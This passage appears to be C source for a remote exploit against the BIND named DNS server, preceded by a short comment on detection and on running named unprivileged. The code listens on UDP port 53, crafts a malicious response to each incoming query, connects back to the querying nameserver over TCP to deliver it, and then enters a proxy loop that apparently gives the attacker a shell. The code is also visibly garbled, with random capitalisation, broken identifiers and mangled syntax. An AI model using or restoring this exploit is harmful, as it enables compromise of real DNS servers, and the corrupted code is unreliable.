 * server followed by an inbound TCP connection to its port 53 from the
 * same remote address, carrying a response-type message. The header
 * comment on this page says the payloads try to leave a chroot and that a
 * named running as root widens the impact, so running named unprivileged
 * limits what a successful attempt can reach.
 */
IF (Argc <2) {fprintf (stderr, "usage:% s architecture [command] / n", argv [0]); fprintf (stderr, "available architectures: / n"); i = -1; while (While Archlist [ i] .id) FPrintf (stderr, "% d:% s / n", archlist [i] .id, archlist [i] .name); exit (1);

Arch = ATOI (Argv [1]) - 1;

IF (argc == 3) Command = argv [2];

IF ((S = Socket, Sock_DGRAM, IPPROTO_UDP)) == - 1) {PERROR ("socket"); exit (1);}

Bzero (& SA, SIZEOF SA);

sa.sin_family = af_inet; sa.sin_addr.s_addr = inaddr_any; sa.sin_port = HTONS (53);

IF (Bind (S. (Struct SockAddr *) & Sa, SizeOf (SA)) == - 1) {PERROR ("Bind"); exit (1);}

Do {fromlen = sizeof (from); if ((res = recvfrom (s, buf, sizeof buf, 0, (struct socddr *) & from, & fromlease) == -1) {PERROR ("Recvfrom"); EXIT 1); }

Printf ("Received Request FROM% S:% D for", INET_NTOA (from_ADDR), NTOHS (from.sin_port)); SL ​​= Form_Response ((Header *) BUF, Sendbuf);

/ * Now Lets Connect to the Nameserver * /

Bzero (& To, SIZEOF (to)); to.sin_Family = AF_INET; TO.SIN_ADDR = from.sin_addr; to.sin_port = HTONS (53);

IF ((S2 = Socket (AF_INET, SOCK_STREAM, 0)) == - 1) {PERROR ("socket"); exit (1);}

IF (Connect (S2, (Struct SockAddr *) & to, SizeOf to) == - 1) {Perror ("Connect"); exit (1);}

Ts = HTONS (SL); Write (S2, & TS, 2);

Write (S2, Sendbuf, SL); IF (Archlist [Arch] .safe> 1) Close (S2);} while (archlist [Arch] .safe> 1); / * Infinite loop for sparc * / proxyloop (S2) EXIT (1);
